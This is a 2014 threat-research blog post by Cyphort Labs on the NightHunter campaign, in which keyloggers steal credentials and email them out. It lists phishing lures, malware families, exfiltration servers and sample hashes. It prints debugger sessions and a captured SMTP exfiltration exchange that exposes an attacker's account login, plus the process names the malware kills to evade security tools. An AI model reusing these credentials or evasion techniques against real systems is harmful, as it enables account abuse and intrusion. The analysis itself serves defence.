Blog

NightHunter data theft campaign building big data threats

Posted on July 9th, 2014 by Nick Bilogorskiy

Cyphort Labs discovered an extensive data theft campaign. It involves several different malware keyloggers, including Predator Pain, Limitless, Spyrex and others. The unifying feature is that they all use SMTP (email) for data exfiltration. Email to social networking is like snail-mail is to email, it is outdated and often overlooked, so it can be a more stealthy way of data theft. So we called it NightHunter.

NightHunter is very aggressive at stealing and sending home the users’ passwords. The actors behind NightHunter could use the trove of stolen credentials to leverage big data analytics to enable new cyber threats, for purposes of extortion, credit card or bank fraud, stealing state secrets or corporate espionage.

Our investigation started with a sample delivered through a phishing email. It is a .Net binary and when executed it steals user’s credentials and sends them to a remote email server. It seems like a naive technique to most of the existing “advanced” security products. We started to look into the sample and found additional “similar” samples and examined the data it exfiltrated to the remote servers.

The NightHunter data theft campaign is believed to have been active since at least 2009, targeting energy firms, educational institutions, hospitals and charities and other enterprises.

 

Common Delivery Mechanism:

These samples are delivered mostly through phishing emails. These emails are sent with DOC/ZIP/RAR attachments. You can get infected by opening a malicious document with scripting enabled. Most of the phishing emails are mostly targeted towards personnel in finance/sales/HR departments. Sometimes actors may act as goods resale agents. We have seen cases where it was bundled with fake IDM/7zip installers. Most of these samples use keylogger tools to sniff data from the victim.

 

 

Most common Phishing Email subject/attachment names:

  1. WireSlip
  2. Jobs List
  3. PO
  4. Reconfirm Pls
  5. Purchase Order
  6. Payment Slip
  7. Order
  8. Inquiry
  9. Remittance Payment Slip

 

Types of Stolen Credentials:

  1. Google
  2. Facebook
  3. Dropbox
  4. Yahoo
  5. Hotmail
  6. Amazon
  7. Skype
  8. LinkedIn
  9. Banks
  10. Rediff

Victims Industries:

  1. Oil industry
  2. Charities
  3. Educational Institutes
  4. Hospitals
  5. Departmental Stores
  6. Auditors
  7. Export/Import Companies.
  8. Insurance Companies
  9. TV Network
  10. Trading Companies

List of keylogger malware used:

  1. Limitless logger lite (http://limitlessproducts.org/)
  2. Predator Pain
  3. Keylogger Logları (SlloTBan)
  4. Spyrex
  5. FEDERIKO\’s Logger
  6. Unknown Logger Public
  7. Aux Logger
  8. Neptune
  9. Clyde Logger
  10. Ultimate Logger
  11. MY Ultimate Jobe
  12. Syslogger
  13. Syndicate Logger (http://syndicateproducts.org)

 

We are seeing Limitless keylogger many places. Next to the Limitless logger, Predator Pain is popular within the actors. Considering the low cost of the tool, easy setup, quality of virus generator and features it supports, we are seeing increasing interest with the actors. Though Limitless Logger is closed down, it was used heavily.

Most of the keyloggers used provide following features:

                                – E-Mail/PHP/FTP upload

                                – Obfuscation

                                – Spoof Extension and Change Icon

                                – Clear Browser Data

                                – Fake Error Message

                                – Capture Screenshot

                                – Disable many programs

                                – Various spreading mechanism

                                – File Downloader

                                – Block various websites

                                – Self-delete

 

 

Data Stealing:

                                – Bitcoin Stealing

                                – Password managers

- Firefox/Google Chrome/IE/Safari/Opera

                                – Outlook

                                – Pidgin/Trillian/Paltalk/AIM/IMVU

                                – Various Games and Game Bots

                                – Filezilla/Flashfxp/CoreFTP/SmartFTP/FTP Commander

 

One of the samples (f997f9bdf00d82a42cb0985c803a0ba1ba0c7faf0b69b0d4a1888f6d1f46d210), even printed out the activity details to the console.

 

 

List of Email servers and Number of samples using particular Email server:

Email Server

Sample Count

First Seen

Last seen

smtp.googlemail.com/smtp.gmail.com

300k

2009

Today

smtp.mail.ru

228

2010-10-08 

2014-06-13 

smtp.live.com

151

2010-08-24 

2014-06-12 

mx1.3owl.com

82

2012-09-10 

2014-06-05 

smtp.mail.com

42

2011-04-20 

2014-06-12 

smtp.yandex.com/smtp.yandex.ru 

39

2010-12-20 

2014-06-12 

smtp.turkceventrilo.com

38

2014-04-02 

2014-06-04 

smtp.mail.yahoo.com

25

2013-02-15 

2014-06-13 

mail.drmike.com.de

31

2014-04-06 

2014-05-29 

smtp.aol.com

13

2010-10-27 

2014-06-06 

smtp.comcast.net

18

2013-05-31 

2014-06-12 

smtp-mail.outlook.com

1

2014-05-23 

smtp.list.ru

1

2014-06-09 

smtp.hanco-ltd.biz

10

2014-04-04 

2014-06-10 

mail.ieindia.org

7

2014-04-29 

2014-06-10 

mail.npcuae.com

1

2014-06-08 

smtp.bilatraders.com

1

2014-06-04 

mail.persian-trading.com 

5

2014-05-25 

2014-06-06 

smtp.poczta.onet.pl 

2

2012-06-02 

2014-06-09 

relay.skynet.be

1

2014-06-04 

Smtp.interia.pl 

1

2014-06-06 

mx.freenet.de 

1

2014-06-05 

cloud73.dotcanada.com

2

2014-04-29 

2014-05-30 

smtp.bk.ru

5

2014-04-21 

2014-05-26 

master.torguard.tg

3

2014-05-16 

2014-05-23 

poczta.o2.pl

4

2014-03-21 

2014-05-31 

smtp.web.de

2

2011-07-03 

2014-04-11 

mail.snookiezinc.com.de 

1

2014-03-18 

mail.atbinco.com

2

2014-05-09 

smtps.bol.com.br

2

2014-04-15 

2014-05-26 

mail.glintcosmetics.com

2

2014-04-25 

2014-06-11 

 

Gmail seems to be the most popular email server used by the criminals to “park” the victim data in recent times. Probably the reason for larger number of samples that use Gmail is it is quite popular and most of the security products somehow “whitelist” Google/Gmail traffic/activity and it is easy to hide this email in the volume of emails sent out to Gmail. Another possible reason is Gmail imposes a lot of restrictions like how many emails a particular account can send on a particular day and actors have to keep sending new malware with new accounts.

 

 

The number of samples the actors sent for other email servers is very low. We believe some of the servers are hacked to create an email account and in some cases actors created their own email server itself. For example, the email server of The Institution of Engineers (ieindia.org) is hacked to create two accounts and used to park the victim data mostly from India. Some of these samples that use private email servers are active for only a few weeks.  

Most of the virus generator tools provide various options to exfiltrate data from the victim machine like Email, FTP and PHP upload. Looking at the patterns most of these actors started with PHP upload and then moved to Email. Analyzing recent malware samples reveals that most of the actors started to use only Email. Very few malware samples use multiple methods to exfiltrate the data like FTP and Email.

 

 

 

mx1.3owl.com

First Seen Date

Infection Count

Keylogger

6/5/2014

2

Predator Pain

6/4/2014

31

Predator Pain

6/4/2014

47

Predator Pain

6/3/2014

10

Predator Pain

6/3/2014

15

Predator Pain

6/3/2014

33

Predator Pain

6/2/2014

2

Predator Pain

6/2/2014

50

Predator Pain

6/2/2014

2

Predator Pain

6/1/2014

33

Predator Pain

5/30/2014

7

Predator Pain

5/25/2014

44

Predator Pain

5/20/2014

6

Predator Pain

5/17/2014

5

Mr. Clyde Logger and Predator

5/15/2014

26

 

5/12/2014

5

Mr. Clyde Logger and Predator

5/11/2014

39

Predator Pain

5/8/2014

59

Predator Pain

5/7/2014

   

5/6/2014

6

Predator Pain

5/2/2014

20

Predator Pain, Limitless Logger

4/24/2014

37

Predator Pain

4/23/2014

 

57

Predator Pain, Limitless Logger

4/22/2014

 

57

57

Predator Pain, Limitless Logger

Predator Pain, Limitless Logger, MY Ultimate Jobe

4/17/2014

 

57

57

14

Predator Pain, Limitless Logger

Predator Pain, Limitless Logger, MY Ultimate Jobe

Predator Pain

4/16/2014

4/15/2014

1

Predator Pain

4/10/2014

73

 

Predator Pain, Limitless Logger

4/9/2014

73

 

Predator Pain, Limitless Logger

Limitless Logger

4/5/2014

57

 

Predator Pain, Limitless Logger

Limitless Logger

Predator Pain, Limitless Logger

4/3/2014

42

3/27/2014

73

2/18/2014

1

Predator Pain

1/28/2014

57

Predator Pain, Limitless Logger, MY Ultimate Jobe

 

 

Actors behind these malware samples (35 out of 82) follow the similar techniques while registering domains. Author’s identity is hidden to the analyst.

 

 

 

List of Samples we looked into and related to mx1.3owl.com

62F3DF70D746C898A3A5ACAD1EB6117F

5DAB1479F63376739DFE0F8140F3263E

0C25431D2B13C99AFC0DE7338E9A3ACE

BDC5A619BC2D96616D900DFEBC2D21E7

845EFE43B05A7334B0AE8CB39C6AA4E5

3164A660B54EBE994B467D765465D23C

09423D5E22289F0F8E31FE4FC2DA0A25

416CE138B5F02F00253FC08989A9CD12

DE59FB78752DE040010EDA63667C26CA

CEC37293C2ADF3C9EECA7EE14979BDAD

26D13E5412D282DA91E4053D92B34271

3CE8C9743D9F523009CA84CD3B12B1B8

71AC33835389B800FE5BDB69786A62B8

3831B1FCE2B1CDC662262D389529A298

8117AAA51EE22F13E817F67E7A816F48

28F718CCE2D22F61108B580746CFD810

736A752D2B0B96741213404177DBD8F6

DEFB1E6E42EDC46FA9630CDF42C347F9

5EFF0A000B0B63D67BD3F9BBFB8991D0

207A9A92C697E83B21FC44E4DF0247AD

7D9F321A673266B4BDE3F48CE132A81E

D0D13CDAB7EE6DC22A52FBB0A2FA5F16

31D0DD3ADBE378F8BF3D13FC0BF69D51

C475E64740710B398F458710E7CBF3FD

F4E7CC408B9902A92181BF46282C46DD

0AA6E7204A3DBA4EBE6F81331FF9EF3B

9716665CB4F603C4D1CA96D7CC7A555C

0E4FA8AB9CF7C64714C436735D68E1F0

B699A3FE2B531139FAB267689B3CEF14

B7103ED3D263578FA26E06C9E6ADBD21

A514FCBDF47C0829843A1C03D1061F28

9350F7B4513198F86987F36A8D400D34

AD9A3311486DF3B7B457779EA486BC5D

9A285873E25F43085D9DE5FCA4D898D5

77CF51DA449598A43CF030A7EC9F223E

4BD63A33567A9EAF80D0E0730DE6AB0A

D1683408FEFA12BB93FC15CE2DEDD7C7

7AD0EABC5B9D6F6B1A7BE35B75F68681

 

 

mail.ieindia.org:

All the samples related to this email server were active for only a few weeks. This is targeted towards people from India. Actors used Limitless logger to extract the information from the victims. Analyst believe that actors hacked into their email server and created two email accounts to park their data. Victims are from different industries.

70b0e2fb1e54d16f96d11685c81071361afb66523c3c81b054344c21df1bd6ec 

2014-06-10 

db3b52afd523055cabcc0df3c9f0eeced65e627fd2f7e2b9d4d8e0f5c6141f42 

2014-06-03 

8dfdd1f019c2b4c3d4bc9fb6a8e15b7a4cca916a5540c7dae65f83c4ec60b2e7 

2014-06-02 

9a71df6f73875488754583f53e6caf9c654526fc55c09c4d4b57003788b844c4 

2014-05-09 

aea5e5650fb857b1675fe68eb7f102e7695322a70defce79f59a72f3f34ea6c4 

2014-05-29 

75b4e7f2917dd18ce7d2d4a9238b5b8072b997ff2634444d0a43b69acc1f14ea 

2014-05-28 

584e6f7326ee93f1f03cca1014263bcef007fcfa6d527a77cb040b20e165bb4a 

2014-04-29 

 

 

 

Manual Analysis

Most of the samples we manually analyzed included lot of obfuscation techniques used to delay the analysis. We will be looking at static analysis details of this sample (MD5: cfb72c025bc99733a7f0c21242738a57) and other related samples too.

Anti-analysis techniques used:

  1. Use non-printable characters as a class/variable names in the code.
  2. Use Assmbly.Load() function to load a different assembly.
  3. Strings in the code are encoded using various methods. (We found almost 10 different ways used)
  4. Various product detection code.
  5. Debugger detection code.

 

Started to look into the binary using various .Net disassemblers. Most of the disassemblers didn’t work for most of the binaries.  Using ILSpy we started to analyze this binary. Internally it decoded another assembly from its resource section and loaded it.

 

 

We decided to dump the second stage using the WinDBG. Most of the first stage binary does not use any debugger detection or security product detection code but second stage does.

                0:000> sxe ld:mscorlib

0:000> sxe ld:mscorjit

0:000> g

0:000> .loadby sos mscorwks

0:000> !bpmd mscorlib.dll System.AppDomain.Load

0:000> g

0:000> !clrstack -a

OS Thread Id: 0xc64 (0)

ESP       EIP    

0045ed38 67f0736c System.AppDomain.Load(Byte[])

    PARAMETERS:

        this = 0x02851268

        rawAssembly = 0x02879c04

    LOCALS:

        <no data>

 

0045ed3c 00341c55 jhgfdertyui.iuytrdfghj.Form1_Load(System.Object, System.EventArgs)

    PARAMETERS:

        this = <no data>

        sender = <no data>

        e = <no data>

    LOCALS:

        <no data>

        0x0045ed3c = 0x02879c04

 

0:000> !da 0x02879c04

Name: System.Byte[]

MethodTable: 67ac37b8

EEClass: 6787eb8c

Size: 32268(0x7e0c) bytes

Array: Rank 1, Number of elements 32256, Type Byte

Element Methodtable: 67ac3868

[0] 02879c0c

[32255] 02881a0b

0:000> .writemem c:\tmp\secondstage.bin 02879c0c L0n32255

Writing 7dff bytes…………….

 

The second stage binary is again obfuscated. It uses a lot of variables with nonprintable characters. We will not be able to set breakpoints in the windbg. We decided to do dynamic analysis on the binary. This binary tries to persist in the system using autorun registry modification. It first tries to connect to a remote server (depends on the binary) to find the external IP address and sends an Email to remote server.

 

It connects to a remote email server (mx1.3owl.com) and sends an email with victim information. It uses Predator Pain v14 keylogger. We extracted the email credentials from the network traffic.

 

Let’s look into other similar binaries that included credentials in plain text in the original sample itself.

MD5: 3d7fee36dcd7f1e6bed77d6d9648ada5d899d3efc8dc1d1fd605f75c065cf84d

 

It hides the email credentials at the end of file.

 

 

Some binaries look for a few security products installed in the machine. If they find any security products, they hide their own window and kill the security product also.

 

 

 

All this detection looks for particular process name.

AntiKeyscrambler() -> keyscrambler

AntiWireshark()       -> wireshark

AntiAnubis()           -> anubis

AntiMalwarebytes()                 -> mbam

AntiKaspersky()      -> avp

AntiOllydbg()          -> ollydbg

AntiOutpost()          -> outpost

AntiNorman()          -> npfmsg

AntiBitDefender()    -> bdagent

AntiNOD32()           -> egui

 

We used windbg to dump the credentials for some of the samples that did not do debugger detection.

0:000> sxe ld:mscorlib

0:000> sxe ld:mscorjit

0:000> sxe ld:System.Windows.Forms.dll

0:000> g

ModLoad: 00000000`6f680000 00000000`6fb4e000   System.Windows.Forms.dll

ntdll!ZwMapViewOfSection+0xa:

00000000`77a6153a c3              ret

0:000> .loadby sos mscorwks

0:000> .symfix

0:000> ld system_ni

0:000> !bpmd System.dll System.Net.NetworkCredential..ctor

0:000> !bpmd System.dll System.Net.NetworkCredential..ctor

Found 4 methods…

Setting breakpoint: bp 000007FEEA84F490 [System.Net.NetworkCredential..ctor()]

Setting breakpoint: bp 000007FEEA3D6B10 [System.Net.NetworkCredential..ctor(System.String, System.String)]

Setting breakpoint: bp 000007FEEA84F4A0 [System.Net.NetworkCredential..ctor(System.String, System.String, System.String)]

Setting breakpoint: bp 000007FEEA84F4C0 [System.Net.NetworkCredential..ctor(System.String, System.String, System.String, Boolean)]

0:000> g

Breakpoint 1 hit

System_ni+0x236b10:

000007fe`ea3d6b10 53              push    rbx

0:000> !dumpobj -nofields rdx

Name: System.String

MethodTable: 000007feeb007d90

EEClass: 000007feeac0e560

Size: 66(0x42) bytes

 (C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll)

String: alinsterpu@gmail.com

0:000> !dumpobj -nofields r8

Name: System.String

MethodTable: 000007feeb007d90

EEClass: 000007feeac0e560

Size: 46(0x2e) bytes

 (C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll)

String: hainerosii

 

Most of the binaries used TCP/587 to send emails to the remote server. Some binaries associated with mx1.3owl.com used TCP/2525 to send emails. We retrieved most of the credentials using dynamic analysis including Gmail. Gmail uses encrypted channel to communicate to the remote server. Since the number of samples that uses Gmail is high, we decided to MITM the Gmail traffic in our malware lab.

S->C 53 b’220 mx.google.com ESMTP ec2sm20231912pbc.63 – gsmtp\r\n’

C->S 16 b’EHLO test-PC\r\n’

S->C 137 b’250-mx.google.com at your service, [67.188.0.147]\r\n250-SIZE 35882577\r\n250-8BITMIME\r\n250-STARTTLS\r\n250-ENHANCEDSTATUSCODES\r\n250 CHUNKING\r\n’

C->S 10 b’STARTTLS\r\n’

S->C 30 b’220 2.0.0 Ready to start TLS\r\n’

Wrapping sockets.

C->S 16 b’EHLO test-PC\r\n’

S->C 178 b’250-mx.google.com at your service, [67.188.0.147]\r\n250-SIZE 35882577\r\n250-8BITMIME\r\n250-AUTH LOGIN PLAIN XOAUTH XOAUTH2 PLAIN-CLIENTTOKEN\r\n250-ENHANCEDSTATUSCODES\r\n250 CHUNKING\r\n’

C->S 41 b’AUTH login YWxpbnN0ZXJwdUBnbWFpbC5jb20=\r\n’

S->C 18 b’334 UGFzc3dvcmQ6\r\n’

C->S 18 b’aGFpbmVyb3NpaQ==\r\n’

S->C 20 b’235 2.7.0 Accepted\r\n’

C->S 34 b’MAIL FROM:<alinsterpu@gmail.com>\r\n’

S->C 42 b’250 2.1.0 OK ec2sm20231912pbc.63 – gsmtp\r\n’

C->S 32 b’RCPT TO:<alinsterpu@gmail.com>\r\n’

S->C 42 b’250 2.1.5 OK ec2sm20231912pbc.63 – gsmtp\r\n’

C->S 6 b’DATA\r\n’

S->C 43 b’354  Go ahead ec2sm20231912pbc.63 – gsmtp\r\n’

C->S 228 b’MIME-Version: 1.0\r\nFrom: alinsterpu@gmail.com\r\nTo: alinsterpu@gmail.com\r\nDate: 17 Jun 2014 01:25:48 +0530\r\nSubject: New keylogger logs!\r\nContent-Type: text/plain; charset=us-ascii\r\nContent-Transfer-Encoding: quoted-printable\r\n\r\n’

C->S 48 b’keylogger started at: 6/17/2014 1:24:43 AM=0D=0A’

 

One of the sample we analyzed (MD5: 8962ca1997193be3931c41983cc4600e941d40bdb0fdddafa00f3761feeb4ba8) used both Email and FTP to exfiltrate data from the users machine.

 

 

 

Most of the samples used code level obfuscation to delay the analysis. In the end, we got 10 different methods (decoding/decryption) to decode various strings. No wonder these samples are created using similar virus generator tools.

NightHunter is a unique campaign in that it tries to fly under the radar with its email exfiltration but is very aggressive at collecting all sorts of data and credentials from the users including passwords, screenshots, etc.